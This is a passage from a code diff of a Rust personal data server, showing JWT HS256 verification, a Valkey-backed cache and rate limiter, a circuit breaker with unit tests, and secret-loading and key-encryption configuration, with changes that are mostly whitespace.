expired")); 142 } 143 + 144 if let Some(scopes) = allowed_scopes { 145 let token_scope = claims.scope.as_deref().unwrap_or(""); 146 if !scopes.contains(&token_scope) { 147 return Err(anyhow!("Invalid token scope: {}", token_scope)); 148 } 149 } 150 + 151 Ok(TokenData { claims }) 152 } 153 + 154 fn verify_token_hs256_internal( 155 token: &str, 156 secret: &[u8], ··· 161 if parts.len() != 3 { 162 return Err(anyhow!("Invalid token format")); 163 } 164 + 165 let header_b64 = parts[0]; 166 let claims_b64 = parts[1]; 167 let signature_b64 = parts[2]; 168 + 169 let header_bytes = URL_SAFE_NO_PAD 170 .decode(header_b64) 171 .context("Base64 decode of header failed")?; 172 + 173 let header: Header = 174 serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?; 175 + 176 if header.alg != "HS256" { 177 return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg)); 178 } 179 + 180 if let Some(expected) = expected_typ { 181 if header.typ != expected { 182 return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ)); 183 } 184 } 185 + 186 let signature_bytes = URL_SAFE_NO_PAD 187 .decode(signature_b64) 188 .context("Base64 decode of signature failed")?; 189 + 190 let message = format!("{}.{}", header_b64, claims_b64); 191 + 192 let mut mac = HmacSha256::new_from_slice(secret) 193 .map_err(|e| anyhow!("Invalid secret: {}", e))?; 194 mac.update(message.as_bytes()); 195 + 196 let expected_signature = mac.finalize().into_bytes(); 197 let is_valid: bool = signature_bytes.ct_eq(&expected_signature).into(); 198 + 199 if !is_valid { 200 return Err(anyhow!("Signature verification failed")); 201 } 202 + 203 let claims_bytes = URL_SAFE_NO_PAD 204 .decode(claims_b64) 205 .context("Base64 decode of claims failed")?; 206 + 207 let claims: Claims = 208 serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?; 209 + 210 let now = Utc::now().timestamp() as usize; 211 if claims.exp < now { 212 return Err(anyhow!("Token expired")); 213 } 214 + 215 if let Some(scopes) = allowed_scopes { 216 let token_scope = claims.scope.as_deref().unwrap_or(""); 217 if !scopes.contains(&token_scope) { 218 return Err(anyhow!("Invalid token scope: {}", token_scope)); 219 } 220 } 221 + 222 Ok(TokenData { claims }) 223 } 224 + 225 pub fn get_algorithm_from_token(token: &str) -> Result<String, String> { 226 let parts: Vec<&str> = token.split('.').collect(); 227 if parts.len() != 3 { 228 return Err("Invalid token format".to_string()); 229 } 230 + 231 let header_bytes = URL_SAFE_NO_PAD 232 .decode(parts[0]) 233 .map_err(|e| format!("Base64 decode failed: {}", e))?; 234 + 235 let header: Header = 236 serde_json::from_slice(&header_bytes).map_err(|e| format!("JSON decode failed: {}", e))?; 237 + 238 Ok(header.alg) 239 }
+24
src/cache/mod.rs
··· 2 use base64::{Engine as _, engine::general_purpose::STANDARD as BASE64}; 3 use std::sync::Arc; 4 use std::time::Duration; 5 #[derive(Debug, thiserror::Error)] 6 pub enum CacheError { 7 #[error("Cache connection error: {0}")] ··· 9 #[error("Serialization error: {0}")] 10 Serialization(String), 11 } 12 #[async_trait] 13 pub trait Cache: Send + Sync { 14 async fn get(&self, key: &str) -> Option<String>; ··· 22 self.set(key, &encoded, ttl).await 23 } 24 } 25 #[derive(Clone)] 26 pub struct ValkeyCache { 27 conn: redis::aio::ConnectionManager, 28 } 29 impl ValkeyCache { 30 pub async fn new(url: &str) -> Result<Self, CacheError> { 31 let client = redis::Client::open(url) ··· 36 .map_err(|e| CacheError::Connection(e.to_string()))?; 37 Ok(Self { conn: manager }) 38 } 39 pub fn connection(&self) -> redis::aio::ConnectionManager { 40 self.conn.clone() 41 } 42 } 43 #[async_trait] 44 impl Cache for ValkeyCache { 45 async fn get(&self, key: &str) -> Option<String> { ··· 51 .ok() 52 .flatten() 53 } 54 async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> { 55 let mut conn = self.conn.clone(); 56 redis::cmd("SET") ··· 62 .await 63 .map_err(|e| CacheError::Connection(e.to_string())) 64 } 65 async fn delete(&self, key: &str) -> Result<(), CacheError> { 66 let mut conn = self.conn.clone(); 67 redis::cmd("DEL") ··· 71 .map_err(|e| CacheError::Connection(e.to_string())) 72 } 73 } 74 pub struct NoOpCache; 75 #[async_trait] 76 impl Cache for NoOpCache { 77 async fn get(&self, _key: &str) -> Option<String> { 78 None 79 } 80 async fn set(&self, _key: &str, _value: &str, _ttl: Duration) -> Result<(), CacheError> { 81 Ok(()) 82 } 83 async fn delete(&self, _key: &str) -> Result<(), CacheError> { 84 Ok(()) 85 } 86 } 87 #[async_trait] 88 pub trait DistributedRateLimiter: Send + Sync { 89 async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool; 90 } 91 #[derive(Clone)] 92 pub struct RedisRateLimiter { 93 conn: redis::aio::ConnectionManager, 94 } 95 impl RedisRateLimiter { 96 pub fn new(conn: redis::aio::ConnectionManager) -> Self { 97 Self { conn } 98 } 99 } 100 #[async_trait] 101 impl DistributedRateLimiter for RedisRateLimiter { 102 async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool { ··· 124 count <= limit as i64 125 } 126 } 127 pub struct NoOpRateLimiter; 128 #[async_trait] 129 impl DistributedRateLimiter for NoOpRateLimiter { 130 async fn check_rate_limit(&self, _key: &str, _limit: u32, _window_ms: u64) -> bool { 131 true 132 } 133 } 134 pub enum CacheBackend { 135 Valkey(ValkeyCache), 136 NoOp, 137 } 138 impl CacheBackend { 139 pub fn rate_limiter(&self) -> Arc<dyn DistributedRateLimiter> { 140 match self { ··· 145 } 146 } 147 } 148 #[async_trait] 149 impl Cache for CacheBackend { 150 async fn get(&self, key: &str) -> Option<String> { ··· 153 CacheBackend::NoOp => None, 154 } 155 } 156 async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> { 157 match self { 158 CacheBackend::Valkey(c) => c.set(key, value, ttl).await, 159 CacheBackend::NoOp => Ok(()), 160 } 161 } 162 async fn delete(&self, key: &str) -> Result<(), CacheError> { 163 match self { 164 CacheBackend::Valkey(c) => c.delete(key).await, ··· 166 } 167 } 168 } 169 pub async fn create_cache() -> (Arc<dyn Cache>, Arc<dyn DistributedRateLimiter>) { 170 match std::env::var("VALKEY_URL") { 171 Ok(url) => match ValkeyCache::new(&url).await {
··· 2 use base64::{Engine as _, engine::general_purpose::STANDARD as BASE64}; 3 use std::sync::Arc; 4 use std::time::Duration; 5 + 6 #[derive(Debug, thiserror::Error)] 7 pub enum CacheError { 8 #[error("Cache connection error: {0}")] ··· 10 #[error("Serialization error: {0}")] 11 Serialization(String), 12 } 13 + 14 #[async_trait] 15 pub trait Cache: Send + Sync { 16 async fn get(&self, key: &str) -> Option<String>; ··· 24 self.set(key, &encoded, ttl).await 25 } 26 } 27 + 28 #[derive(Clone)] 29 pub struct ValkeyCache { 30 conn: redis::aio::ConnectionManager, 31 } 32 + 33 impl ValkeyCache { 34 pub async fn new(url: &str) -> Result<Self, CacheError> { 35 let client = redis::Client::open(url) ··· 40 .map_err(|e| CacheError::Connection(e.to_string()))?; 41 Ok(Self { conn: manager }) 42 } 43 + 44 pub fn connection(&self) -> redis::aio::ConnectionManager { 45 self.conn.clone() 46 } 47 } 48 + 49 #[async_trait] 50 impl Cache for ValkeyCache { 51 async fn get(&self, key: &str) -> Option<String> { ··· 57 .ok() 58 .flatten() 59 } 60 + 61 async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> { 62 let mut conn = self.conn.clone(); 63 redis::cmd("SET") ··· 69 .await 70 .map_err(|e| CacheError::Connection(e.to_string())) 71 } 72 + 73 async fn delete(&self, key: &str) -> Result<(), CacheError> { 74 let mut conn = self.conn.clone(); 75 redis::cmd("DEL") ··· 79 .map_err(|e| CacheError::Connection(e.to_string())) 80 } 81 } 82 + 83 pub struct NoOpCache; 84 + 85 #[async_trait] 86 impl Cache for NoOpCache { 87 async fn get(&self, _key: &str) -> Option<String> { 88 None 89 } 90 + 91 async fn set(&self, _key: &str, _value: &str, _ttl: Duration) -> Result<(), CacheError> { 92 Ok(()) 93 } 94 + 95 async fn delete(&self, _key: &str) -> Result<(), CacheError> { 96 Ok(()) 97 } 98 } 99 + 100 #[async_trait] 101 pub trait DistributedRateLimiter: Send + Sync { 102 async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool; 103 } 104 + 105 #[derive(Clone)] 106 pub struct RedisRateLimiter { 107 conn: redis::aio::ConnectionManager, 108 } 109 + 110 impl RedisRateLimiter { 111 pub fn new(conn: redis::aio::ConnectionManager) -> Self { 112 Self { conn } 113 } 114 } 115 + 116 #[async_trait] 117 impl DistributedRateLimiter for RedisRateLimiter { 118 async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool { ··· 140 count <= limit as i64 141 } 142 } 143 + 144 pub struct NoOpRateLimiter; 145 + 146 #[async_trait] 147 impl DistributedRateLimiter for NoOpRateLimiter { 148 async fn check_rate_limit(&self, _key: &str, _limit: u32, _window_ms: u64) -> bool { 149 true 150 } 151 } 152 + 153 pub enum CacheBackend { 154 Valkey(ValkeyCache), 155 NoOp, 156 } 157 + 158 impl CacheBackend { 159 pub fn rate_limiter(&self) -> Arc<dyn DistributedRateLimiter> { 160 match self { ··· 165 } 166 } 167 } 168 + 169 #[async_trait] 170 impl Cache for CacheBackend { 171 async fn get(&self, key: &str) -> Option<String> { ··· 174 CacheBackend::NoOp => None, 175 } 176 } 177 + 178 async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> { 179 match self { 180 CacheBackend::Valkey(c) => c.set(key, value, ttl).await, 181 CacheBackend::NoOp => Ok(()), 182 } 183 } 184 + 185 async fn delete(&self, key: &str) -> Result<(), CacheError> { 186 match self { 187 CacheBackend::Valkey(c) => c.delete(key).await, ··· 189 } 190 } 191 } 192 + 193 pub async fn create_cache() -> (Arc<dyn Cache>, Arc<dyn DistributedRateLimiter>) { 194 match std::env::var("VALKEY_URL") { 195 Ok(url) => match ValkeyCache::new(&url).await {
+45
src/circuit_breaker.rs
··· 2 use std::sync::Arc; 3 use std::time::Duration; 4 use tokio::sync::RwLock; 5 #[derive(Debug, Clone, Copy, PartialEq, Eq)] 6 pub enum CircuitState { 7 Closed, 8 Open, 9 HalfOpen, 10 } 11 pub struct CircuitBreaker { 12 name: String, 13 failure_threshold: u32, ··· 18 success_count: AtomicU32, 19 last_failure_time: AtomicU64, 20 } 21 impl CircuitBreaker { 22 pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self { 23 Self { ··· 31 last_failure_time: AtomicU64::new(0), 32 } 33 } 34 pub async fn can_execute(&self) -> bool { 35 let state = self.state.read().await; 36 match *state { 37 CircuitState::Closed => true, 38 CircuitState::Open => { ··· 41 .duration_since(std::time::UNIX_EPOCH) 42 .unwrap() 43 .as_secs(); 44 if now - last_failure >= self.timeout.as_secs() { 45 drop(state); 46 let mut state = self.state.write().await; ··· 56 CircuitState::HalfOpen => true, 57 } 58 } 59 pub async fn record_success(&self) { 60 let state = *self.state.read().await; 61 match state { 62 CircuitState::Closed => { 63 self.failure_count.store(0, Ordering::SeqCst); ··· 75 CircuitState::Open => {} 76 } 77 } 78 pub async fn record_failure(&self) { 79 let state = *self.state.read().await; 80 match state { 81 CircuitState::Closed => { 82 let count = self.failure_count.fetch_add(1, Ordering::SeqCst) + 1; ··· 110 CircuitState::Open => {} 111 } 112 } 113 pub async fn state(&self) -> CircuitState { 114 *self.state.read().await 115 } 116 pub fn name(&self) -> &str { 117 &self.name 118 } 119 } 120 #[derive(Clone)] 121 pub struct CircuitBreakers { 122 pub plc_directory: Arc<CircuitBreaker>, 123 pub relay_notification: Arc<CircuitBreaker>, 124 } 125 impl Default for CircuitBreakers { 126 fn default() -> Self { 127 Self::new() 128 } 129 } 130 impl CircuitBreakers { 131 pub fn new() -> Self { 132 Self { ··· 135 } 136 } 137 } 138 #[derive(Debug)] 139 pub struct CircuitOpenError { 140 pub circuit_name: String, 141 } 142 impl std::fmt::Display for CircuitOpenError { 143 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { 144 write!(f, "Circuit breaker '{}' is open", self.circuit_name) 145 } 146 } 147 impl std::error::Error for CircuitOpenError {} 148 pub async fn with_circuit_breaker<T, E, F, Fut>( 149 circuit: &CircuitBreaker, 150 operation: F, ··· 158 circuit_name: circuit.name().to_string(), 159 })); 160 } 161 match operation().await { 162 Ok(result) => { 163 circuit.record_success().await; ··· 169 } 170 } 171 } 172 #[derive(Debug)] 173 pub enum CircuitBreakerError<E> { 174 CircuitOpen(CircuitOpenError), 175 OperationFailed(E), 176 } 177 impl<E: std::fmt::Display> std::fmt::Display for CircuitBreakerError<E> { 178 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { 179 match self { ··· 182 } 183 } 184 } 185 impl<E: std::error::Error + 'static> std::error::Error for CircuitBreakerError<E> { 186 fn source(&self) -> Option<&(dyn std::error::Error + 'static)> { 187 match self { ··· 190 } 191 } 192 } 193 #[cfg(test)] 194 mod tests { 195 use super::*; 196 #[tokio::test] 197 async fn test_circuit_breaker_starts_closed() { 198 let cb = CircuitBreaker::new("test", 3, 2, 10); 199 assert_eq!(cb.state().await, CircuitState::Closed); 200 assert!(cb.can_execute().await); 201 } 202 #[tokio::test] 203 async fn test_circuit_breaker_opens_after_failures() { 204 let cb = CircuitBreaker::new("test", 3, 2, 10); 205 cb.record_failure().await; 206 assert_eq!(cb.state().await, CircuitState::Closed); 207 cb.record_failure().await; 208 assert_eq!(cb.state().await, CircuitState::Closed); 209 cb.record_failure().await; 210 assert_eq!(cb.state().await, CircuitState::Open); 211 assert!(!cb.can_execute().await); 212 } 213 #[tokio::test] 214 async fn test_circuit_breaker_success_resets_failures() { 215 let cb = CircuitBreaker::new("test", 3, 2, 10); 216 cb.record_failure().await; 217 cb.record_failure().await; 218 cb.record_success().await; 219 cb.record_failure().await; 220 cb.record_failure().await; 221 assert_eq!(cb.state().await, CircuitState::Closed); 222 cb.record_failure().await; 223 assert_eq!(cb.state().await, CircuitState::Open); 224 } 225 #[tokio::test] 226 async fn test_circuit_breaker_half_open_closes_after_successes() { 227 let cb = CircuitBreaker::new("test", 3, 2, 0); 228 for _ in 0..3 { 229 cb.record_failure().await; 230 } 231 assert_eq!(cb.state().await, CircuitState::Open); 232 tokio::time::sleep(Duration::from_millis(100)).await; 233 assert!(cb.can_execute().await); 234 assert_eq!(cb.state().await, CircuitState::HalfOpen); 235 cb.record_success().await; 236 assert_eq!(cb.state().await, CircuitState::HalfOpen); 237 cb.record_success().await; 238 assert_eq!(cb.state().await, CircuitState::Closed); 239 } 240 #[tokio::test] 241 async fn test_circuit_breaker_half_open_reopens_on_failure() { 242 let cb = CircuitBreaker::new("test", 3, 2, 0); 243 for _ in 0..3 { 244 cb.record_failure().await; 245 } 246 tokio::time::sleep(Duration::from_millis(100)).await; 247 cb.can_execute().await; 248 cb.record_failure().await; 249 assert_eq!(cb.state().await, CircuitState::Open); 250 } 251 #[tokio::test] 252 async fn test_with_circuit_breaker_helper() { 253 let cb = CircuitBreaker::new("test", 3, 2, 10); 254 let result: Result<i32, CircuitBreakerError<std::io::Error>> = 255 with_circuit_breaker(&cb, || async { Ok(42) }).await; 256 assert!(result.is_ok()); 257 assert_eq!(result.unwrap(), 42); 258 let result: Result<i32, CircuitBreakerError<&str>> = 259 with_circuit_breaker(&cb, || async { Err("error") }).await; 260 assert!(result.is_err());
··· 2 use std::sync::Arc; 3 use std::time::Duration; 4 use tokio::sync::RwLock; 5 + 6 #[derive(Debug, Clone, Copy, PartialEq, Eq)] 7 pub enum CircuitState { 8 Closed, 9 Open, 10 HalfOpen, 11 } 12 + 13 pub struct CircuitBreaker { 14 name: String, 15 failure_threshold: u32, ··· 20 success_count: AtomicU32, 21 last_failure_time: AtomicU64, 22 } 23 + 24 impl CircuitBreaker { 25 pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self { 26 Self { ··· 34 last_failure_time: AtomicU64::new(0), 35 } 36 } 37 + 38 pub async fn can_execute(&self) -> bool { 39 let state = self.state.read().await; 40 + 41 match *state { 42 CircuitState::Closed => true, 43 CircuitState::Open => { ··· 46 .duration_since(std::time::UNIX_EPOCH) 47 .unwrap() 48 .as_secs(); 49 + 50 if now - last_failure >= self.timeout.as_secs() { 51 drop(state); 52 let mut state = self.state.write().await; ··· 62 CircuitState::HalfOpen => true, 63 } 64 } 65 + 66 pub async fn record_success(&self) { 67 let state = *self.state.read().await; 68 + 69 match state { 70 CircuitState::Closed => { 71 self.failure_count.store(0, Ordering::SeqCst); ··· 83 CircuitState::Open => {} 84 } 85 } 86 + 87 pub async fn record_failure(&self) { 88 let state = *self.state.read().await; 89 + 90 match state { 91 CircuitState::Closed => { 92 let count = self.failure_count.fetch_add(1, Ordering::SeqCst) + 1; ··· 120 CircuitState::Open => {} 121 } 122 } 123 + 124 pub async fn state(&self) -> CircuitState { 125 *self.state.read().await 126 } 127 + 128 pub fn name(&self) -> &str { 129 &self.name 130 } 131 } 132 + 133 #[derive(Clone)] 134 pub struct CircuitBreakers { 135 pub plc_directory: Arc<CircuitBreaker>, 136 pub relay_notification: Arc<CircuitBreaker>, 137 } 138 + 139 impl Default for CircuitBreakers { 140 fn default() -> Self { 141 Self::new() 142 } 143 } 144 + 145 impl CircuitBreakers { 146 pub fn new() -> Self { 147 Self { ··· 150 } 151 } 152 } 153 + 154 #[derive(Debug)] 155 pub struct CircuitOpenError { 156 pub circuit_name: String, 157 } 158 + 159 impl std::fmt::Display for CircuitOpenError { 160 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { 161 write!(f, "Circuit breaker '{}' is open", self.circuit_name) 162 } 163 } 164 + 165 impl std::error::Error for CircuitOpenError {} 166 + 167 pub async fn with_circuit_breaker<T, E, F, Fut>( 168 circuit: &CircuitBreaker, 169 operation: F, ··· 177 circuit_name: circuit.name().to_string(), 178 })); 179 } 180 + 181 match operation().await { 182 Ok(result) => { 183 circuit.record_success().await; ··· 189 } 190 } 191 } 192 + 193 #[derive(Debug)] 194 pub enum CircuitBreakerError<E> { 195 CircuitOpen(CircuitOpenError), 196 OperationFailed(E), 197 } 198 + 199 impl<E: std::fmt::Display> std::fmt::Display for CircuitBreakerError<E> { 200 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { 201 match self { ··· 204 } 205 } 206 } 207 + 208 impl<E: std::error::Error + 'static> std::error::Error for CircuitBreakerError<E> { 209 fn source(&self) -> Option<&(dyn std::error::Error + 'static)> { 210 match self { ··· 213 } 214 } 215 } 216 + 217 #[cfg(test)] 218 mod tests { 219 use super::*; 220 + 221 #[tokio::test] 222 async fn test_circuit_breaker_starts_closed() { 223 let cb = CircuitBreaker::new("test", 3, 2, 10); 224 assert_eq!(cb.state().await, CircuitState::Closed); 225 assert!(cb.can_execute().await); 226 } 227 + 228 #[tokio::test] 229 async fn test_circuit_breaker_opens_after_failures() { 230 let cb = CircuitBreaker::new("test", 3, 2, 10); 231 + 232 cb.record_failure().await; 233 assert_eq!(cb.state().await, CircuitState::Closed); 234 + 235 cb.record_failure().await; 236 assert_eq!(cb.state().await, CircuitState::Closed); 237 + 238 cb.record_failure().await; 239 assert_eq!(cb.state().await, CircuitState::Open); 240 assert!(!cb.can_execute().await); 241 } 242 + 243 #[tokio::test] 244 async fn test_circuit_breaker_success_resets_failures() { 245 let cb = CircuitBreaker::new("test", 3, 2, 10); 246 + 247 cb.record_failure().await; 248 cb.record_failure().await; 249 cb.record_success().await; 250 + 251 cb.record_failure().await; 252 cb.record_failure().await; 253 assert_eq!(cb.state().await, CircuitState::Closed); 254 + 255 cb.record_failure().await; 256 assert_eq!(cb.state().await, CircuitState::Open); 257 } 258 + 259 #[tokio::test] 260 async fn test_circuit_breaker_half_open_closes_after_successes() { 261 let cb = CircuitBreaker::new("test", 3, 2, 0); 262 + 263 for _ in 0..3 { 264 cb.record_failure().await; 265 } 266 assert_eq!(cb.state().await, CircuitState::Open); 267 + 268 tokio::time::sleep(Duration::from_millis(100)).await; 269 assert!(cb.can_execute().await); 270 assert_eq!(cb.state().await, CircuitState::HalfOpen); 271 + 272 cb.record_success().await; 273 assert_eq!(cb.state().await, CircuitState::HalfOpen); 274 + 275 cb.record_success().await; 276 assert_eq!(cb.state().await, CircuitState::Closed); 277 } 278 + 279 #[tokio::test] 280 async fn test_circuit_breaker_half_open_reopens_on_failure() { 281 let cb = CircuitBreaker::new("test", 3, 2, 0); 282 + 283 for _ in 0..3 { 284 cb.record_failure().await; 285 } 286 + 287 tokio::time::sleep(Duration::from_millis(100)).await; 288 cb.can_execute().await; 289 + 290 cb.record_failure().await; 291 assert_eq!(cb.state().await, CircuitState::Open); 292 } 293 + 294 #[tokio::test] 295 async fn test_with_circuit_breaker_helper() { 296 let cb = CircuitBreaker::new("test", 3, 2, 10); 297 + 298 let result: Result<i32, CircuitBreakerError<std::io::Error>> = 299 with_circuit_breaker(&cb, || async { Ok(42) }).await; 300 assert!(result.is_ok()); 301 assert_eq!(result.unwrap(), 42); 302 + 303 let result: Result<i32, CircuitBreakerError<&str>> = 304 with_circuit_breaker(&cb, || async { Err("error") }).await; 305 assert!(result.is_err());
+32
src/config.rs
··· 8 use p256::ecdsa::SigningKey; 9 use sha2::{Digest, Sha256}; 10 use std::sync::OnceLock; 11 static CONFIG: OnceLock<AuthConfig> = OnceLock::new(); 12 pub const ENCRYPTION_VERSION: i32 = 1; 13 pub struct AuthConfig { 14 jwt_secret: String, 15 dpop_secret: String, ··· 20 pub signing_key_y: String, 21 key_encryption_key: [u8; 32], 22 } 23 impl AuthConfig { 24 pub fn init() -> &'static Self { 25 CONFIG.get_or_init(|| { ··· 33 ); 34 } 35 }); 36 let dpop_secret = std::env::var("DPOP_SECRET").unwrap_or_else(|_| { 37 if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() { 38 "test-dpop-secret-not-for-production".to_string() ··· 43 ); 44 } 45 }); 46 if jwt_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() { 47 panic!("JWT_SECRET must be at least 32 characters"); 48 } 49 if dpop_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() { 50 panic!("DPOP_SECRET must be at least 32 characters"); 51 } 52 let mut hasher = Sha256::new(); 53 hasher.update(b"oauth-signing-key-derivation:"); 54 hasher.update(jwt_secret.as_bytes()); 55 let seed = hasher.finalize(); 56 let signing_key = SigningKey::from_slice(&seed) 57 .unwrap_or_else(|e| panic!("Failed to create signing key from seed: {}. This is a bug.", e)); 58 let verifying_key = signing_key.verifying_key(); 59 let point = verifying_key.to_encoded_point(false); 60 let signing_key_x = URL_SAFE_NO_PAD.encode( 61 point.x().expect("EC point missing X coordinate - this should never happen") 62 ); 63 let signing_key_y = URL_SAFE_NO_PAD.encode( 64 point.y().expect("EC point missing Y coordinate - this should never happen") 65 ); 66 let mut kid_hasher = Sha256::new(); 67 kid_hasher.update(signing_key_x.as_bytes()); 68 kid_hasher.update(signing_key_y.as_bytes()); 69 let kid_hash = kid_hasher.finalize(); 70 let signing_key_id = URL_SAFE_NO_PAD.encode(&kid_hash[..8]); 71 let master_key = std::env::var("MASTER_KEY").unwrap_or_else(|_| { 72 if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() { 73 "test-master-key-not-for-production".to_string() ··· 78 ); 79 } 80 }); 81 if master_key.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() { 82 panic!("MASTER_KEY must be at least 32 characters"); 83 } 84 let hk = Hkdf::<Sha256>::new(None, master_key.as_bytes()); 85 let mut key_encryption_key = [0u8; 32]; 86 hk.expand(b"bspds-user-key-encryption", &mut key_encryption_key) 87 .expect("HKDF expansion failed"); 88 AuthConfig { 89 jwt_secret, 90 dpop_secret, ··· 96 } 97 }) 98 } 99 pub fn get() -> &'static Self { 100 CONFIG.get().expect("AuthConfig not initialized - call AuthConfig::init() first") 101 } 102 pub fn jwt_secret(&self) -> &str { 103 &self.jwt_secret 104 } 105 pub fn dpop_secret(&self) -> &str { 106 &self.dpop_secret 107 } 108 pub fn encrypt_user_key(&self, plaintext: &[u8]) -> Result<Vec<u8>, String> { 109 use rand::RngCore; 110 let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key) 111 .map_err(|e| format!("Failed to create cipher: {}", e))?; 112 let mut nonce_bytes = [0u8; 12]; 113 rand::thread_rng().fill_bytes(&mut nonce_bytes); 114 #[allow(deprecated)] 115 let nonce = Nonce::from_slice(&nonce_bytes); 116 let ciphertext = cipher 117 .encrypt(nonce, plaintext) 118 .map_err(|e| format!("Encryption failed: {}", e))?; 119 let mut result = Vec::with_capacity(12 + ciphertext.len()); 120 result.extend_from_slice(&nonce_bytes); 121 result.extend_from_slice(&ciphertext); 122 Ok(result) 123 } 124 pub fn decrypt_user_key(&self, encrypted: &[u8]) -> Result<Vec<u8>, String> { 125 if encrypted.len() < 12 { 126 return Err("Encrypted data too short".to_string()); 127 } 128 let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key) 129 .map_err(|e| format!("Failed to create cipher: {}", e))?; 130 #[allow(deprecated)] 131 let nonce = Nonce::from_slice(&encrypted[..12]); 132 let ciphertext = &encrypted[12..]; 133 cipher 134 .decrypt(nonce, ciphertext) 135 .map_err(|e| format!("Decryption failed: {}", e)) 136 } 137 } 138 pub fn encrypt_key(plaintext: &[u8]) -> Result<Vec<u8>, String> { 139 AuthConfig::get().encrypt_user_key(plaintext) 140 } 141 pub fn decrypt_key(encrypted: &[u8], version: Option<i32>) -> Result<Vec<u8>, String> { 142 match version.unwrap_or(0) { 143 0 => Ok(encrypted.to_vec()),
··· 8 use p256::ecdsa::SigningKey; 9 use sha2::{Digest, Sha256}; 10 use std::sync::OnceLock; 11 + 12 static CONFIG: OnceLock<AuthConfig> = OnceLock::new(); 13 + 14 pub const ENCRYPTION_VERSION: i32 = 1; 15 + 16 pub struct AuthConfig { 17 jwt_secret: String, 18 dpop_secret: String, ··· 23 pub signing_key_y: String, 24 key_encryption_key: [u8; 32], 25 } 26 + 27 impl AuthConfig { 28 pub fn init() -> &'static Self { 29 CONFIG.get_or_init(|| { ··· 37 ); 38 } 39 }); 40 + 41 let dpop_secret = std::env::var("DPOP_SECRET").unwrap_or_else(|_| { 42 if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() { 43 "test-dpop-secret-not-for-production".to_string() ··· 48 ); 49 } 50 }); 51 + 52 if jwt_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() { 53 panic!("JWT_SECRET must be at least 32 characters"); 54 } 55 + 56 if dpop_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() { 57 panic!("DPOP_SECRET must be at least 32 characters"); 58 } 59 + 60 let mut hasher = Sha256::new(); 61 hasher.update(b"oauth-signing-key-derivation:"); 62 hasher.update(jwt_secret.as_bytes()); 63 let seed = hasher.finalize(); 64 + 65 let signing_key = SigningKey::from_slice(&seed) 66 .unwrap_or_else(|e| panic!("Failed to create signing key from seed: {}. This is a bug.", e)); 67 + 68 let verifying_key = signing_key.verifying_key(); 69 let point = verifying_key.to_encoded_point(false); 70 + 71 let signing_key_x = URL_SAFE_NO_PAD.encode( 72 point.x().expect("EC point missing X coordinate - this should never happen") 73 ); 74 let signing_key_y = URL_SAFE_NO_PAD.encode( 75 point.y().expect("EC point missing Y coordinate - this should never happen") 76 ); 77 + 78 let mut kid_hasher = Sha256::new(); 79 kid_hasher.update(signing_key_x.as_bytes()); 80 kid_hasher.update(signing_key_y.as_bytes()); 81 let kid_hash = kid_hasher.finalize(); 82 let signing_key_id = URL_SAFE_NO_PAD.encode(&kid_hash[..8]); 83 + 84 let master_key = std::env::var("MASTER_KEY").unwrap_or_else(|_| { 85 if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() { 86 "test-master-key-not-for-production".to_string() ··· 91 ); 92 } 93 }); 94 + 95 if master_key.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() { 96 panic!("MASTER_KEY must be at least 32 characters"); 97 } 98 + 99 let hk = Hkdf::<Sha256>::new(None, master_key.as_bytes()); 100 let mut key_encryption_key = [0u8; 32]; 101 hk.expand(b"bspds-user-key-encryption", &mut key_encryption_key) 102 .expect("HKDF expansion failed"); 103 + 104 AuthConfig { 105 jwt_secret, 106 dpop_secret, ··· 112 } 113 }) 114 } 115 + 116 pub fn get() -> &'static Self { 117 CONFIG.get().expect("AuthConfig not initialized - call AuthConfig::init() first") 118 } 119 + 120 pub fn jwt_secret(&self) -> &str { 121 &self.jwt_secret 122 } 123 + 124 pub fn dpop_secret(&self) -> &str { 125 &self.dpop_secret 126 } 127 + 128 pub fn encrypt_user_key(&self, plaintext: &[u8]) -> Result<Vec<u8>, String> { 129 use rand::RngCore; 130 + 131 let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key) 132 .map_err(|e| format!("Failed to create cipher: {}", e))?; 133 + 134 let mut nonce_bytes = [0u8; 12]; 135 rand::thread_rng().fill_bytes(&mut nonce_bytes); 136 + 137 #[allow(deprecated)] 138 let nonce = Nonce::from_slice(&nonce_bytes); 139 + 140 let ciphertext = cipher 141 .encrypt(nonce, plaintext) 142 .map_err(|e| format!("Encryption failed: {}", e))?; 143 + 144 let mut result = Vec::with_capacity(12 + ciphertext.len()); 145 result.extend_from_slice(&nonce_bytes); 146 result.extend_from_slice(&ciphertext); 147 + 148 Ok(result) 149 } 150 + 